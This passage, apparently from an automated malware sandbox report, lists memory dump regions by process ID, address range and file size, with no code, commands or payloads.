                                                                                                                                                                                                                                                                                          4.8MB

                                                                                                                                                                                                                                                                                        • memory/2768-21-0x00000000050D0000-0x00000000050D1000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/2768-20-0x00000000050F0000-0x00000000050F1000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/2768-22-0x0000000005110000-0x0000000005111000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/2768-19-0x00000000050E0000-0x00000000050E1000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/2768-103-0x0000000000D30000-0x00000000011FC000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4.8MB

                                                                                                                                                                                                                                                                                        • memory/2768-17-0x0000000000D30000-0x00000000011FC000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4.8MB

                                                                                                                                                                                                                                                                                        • memory/2768-26-0x0000000005120000-0x0000000005121000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/2768-664-0x0000000000D30000-0x00000000011FC000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4.8MB

                                                                                                                                                                                                                                                                                        • memory/2824-112-0x0000000000040000-0x00000000000B4000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          464KB

                                                                                                                                                                                                                                                                                        • memory/3380-191-0x0000000000CE0000-0x0000000000D32000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          328KB

                                                                                                                                                                                                                                                                                        • memory/3380-192-0x0000000005670000-0x0000000005680000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                                                                        • memory/3380-190-0x0000000073620000-0x0000000073DD1000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          7.7MB

                                                                                                                                                                                                                                                                                        • memory/3616-698-0x000000006BC80000-0x000000006BDFD000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                                                                                                        • memory/3616-700-0x00007FFABE060000-0x00007FFABE269000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          2.0MB

                                                                                                                                                                                                                                                                                        • memory/3824-76-0x0000000073620000-0x0000000073DD1000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          7.7MB

                                                                                                                                                                                                                                                                                        • memory/3824-74-0x0000000000400000-0x0000000000592000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                                                                                                        • memory/3824-79-0x0000000005160000-0x0000000005170000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                                                                        • memory/3824-252-0x0000000073620000-0x0000000073DD1000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          7.7MB

                                                                                                                                                                                                                                                                                        • memory/3824-256-0x0000000005160000-0x0000000005170000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                                                                        • memory/3972-109-0x0000000000400000-0x000000000044E000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          312KB

                                                                                                                                                                                                                                                                                        • memory/3972-122-0x0000000000400000-0x000000000044E000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          312KB

                                                                                                                                                                                                                                                                                        • memory/3972-113-0x0000000000400000-0x000000000044E000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          312KB

                                                                                                                                                                                                                                                                                        • memory/4444-75-0x0000000000500000-0x00000000007B8000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          2.7MB

                                                                                                                                                                                                                                                                                        • memory/4540-655-0x000000006BC80000-0x000000006BDFD000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                                                                                                        • memory/4540-742-0x000000006BC80000-0x000000006BDFD000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                                                                                                        • memory/4540-568-0x0000000000400000-0x0000000000C2C000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          8.2MB

                                                                                                                                                                                                                                                                                        • memory/4540-663-0x000000006BC80000-0x000000006BDFD000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                                                                                                        • memory/4540-661-0x00007FFABE060000-0x00007FFABE269000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          2.0MB

                                                                                                                                                                                                                                                                                        • memory/4668-2-0x00000000007B0000-0x0000000000C7C000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4.8MB

                                                                                                                                                                                                                                                                                        • memory/4668-7-0x0000000004C70000-0x0000000004C71000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4668-9-0x0000000004CF0000-0x0000000004CF1000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4668-8-0x0000000004C80000-0x0000000004C81000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4668-4-0x0000000004CB0000-0x0000000004CB1000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4668-1-0x0000000077C66000-0x0000000077C68000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                        • memory/4668-5-0x0000000004C90000-0x0000000004C91000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4668-0-0x00000000007B0000-0x0000000000C7C000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4.8MB

                                                                                                                                                                                                                                                                                        • memory/4668-3-0x0000000004CA0000-0x0000000004CA1000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4668-6-0x0000000004CD0000-0x0000000004CD1000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4668-14-0x00000000007B0000-0x0000000000C7C000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4.8MB

                                                                                                                                                                                                                                                                                        • memory/4740-455-0x0000000000400000-0x0000000000408000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                                                                                        • memory/4872-55-0x00000000010B0000-0x00000000010B1000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                        • memory/4872-50-0x0000000000400000-0x000000000044C000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                                                                                        • memory/4872-53-0x0000000000400000-0x000000000044C000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                                                                                        • memory/4872-56-0x0000000000400000-0x000000000044C000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                                                                                        • memory/4896-690-0x0000000000400000-0x0000000004064000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          60.4MB

                                                                                                                                                                                                                                                                                        • memory/4940-156-0x00000000063B0000-0x00000000063CE000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                                                                                        • memory/4940-131-0x0000000004F60000-0x0000000004F6A000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                                                                                        • memory/4940-166-0x0000000006640000-0x000000000674A000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          1.0MB

                                                                                                                                                                                                                                                                                        • memory/4940-170-0x0000000006750000-0x000000000679C000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                                                                                        • memory/4940-127-0x0000000073620000-0x0000000073DD1000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          7.7MB

                                                                                                                                                                                                                                                                                        • memory/4940-126-0x0000000000570000-0x00000000005C2000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          328KB

                                                                                                                                                                                                                                                                                        • memory/4940-169-0x00000000065E0000-0x000000000661C000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          240KB

                                                                                                                                                                                                                                                                                        • memory/4940-160-0x0000000006AF0000-0x0000000007108000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          6.1MB

                                                                                                                                                                                                                                                                                        • memory/4940-128-0x0000000005480000-0x0000000005A26000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          5.6MB

                                                                                                                                                                                                                                                                                        • memory/4940-146-0x0000000005A30000-0x0000000005AA6000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          472KB

                                                                                                                                                                                                                                                                                        • memory/4940-129-0x0000000004F70000-0x0000000005002000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          584KB

                                                                                                                                                                                                                                                                                        • memory/4940-168-0x0000000006580000-0x0000000006592000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          72KB

                                                                                                                                                                                                                                                                                        • memory/4940-130-0x0000000004F00000-0x0000000004F10000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                                                                        • memory/5108-713-0x000000006BC80000-0x000000006BDFD000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                                                                                                        • memory/5108-721-0x00007FFABE060000-0x00007FFABE269000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          2.0MB

                                                                                                                                                                                                                                                                                        • memory/5112-741-0x0000000000400000-0x0000000004423000-memory.dmp

                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                          64.1MB